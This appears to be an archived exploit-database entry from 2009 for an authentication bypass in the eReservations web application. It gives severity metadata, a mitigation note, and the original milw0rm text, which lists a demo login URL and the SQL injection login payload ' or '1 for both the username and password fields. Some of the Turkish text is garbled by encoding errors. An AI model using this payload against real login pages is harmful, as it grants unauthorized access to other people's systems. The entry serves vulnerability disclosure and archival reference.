eReservations (Auth Bypass)

vendor:

eReservations

by:

ByALBAYX

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: eReservations

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

eReservations (Auth Bypass)

eReservations is prone to an authentication-bypass vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to gain access to the application without providing valid credentials.

Mitigation:

The vendor has released a patch to address this issue. Users are advised to upgrade to the latest version.

Source

Exploit-DB raw data:

#----C4TEAM.ORG---ByALBAYX----C4TEAM.ORG----#
#############################################
[~]Author   : ByALBAYX

[~]Website  : WWW.C4TEAM.ORG
#############################################
[~]eReservations (Auth Bypass)

[~]Script        : eReservations

[~]Price         : $249.95  save $50.00   :) 

[~]Demo          : http://reservations.enthrallweb.us/Login.asp

[~]Details       : http://enthrallweb.com/detail.asp?productID=16
#############################################
[~]username  : ' or '1

[~]password  : ' or '1
#############################################
[~]Ä°ÅŸinize BaqÄ±n :=)

[~]Greetz For C4TEAM Members
#############################################
Derdimi dinledim, derdimden Ä°ÄžRENDÄ°M...
Onun derdini gÃ¶rdÃ¼m, derdime Ä°MRENDÄ°M...
----------
FilistiN

# milw0rm.com [2009-01-16]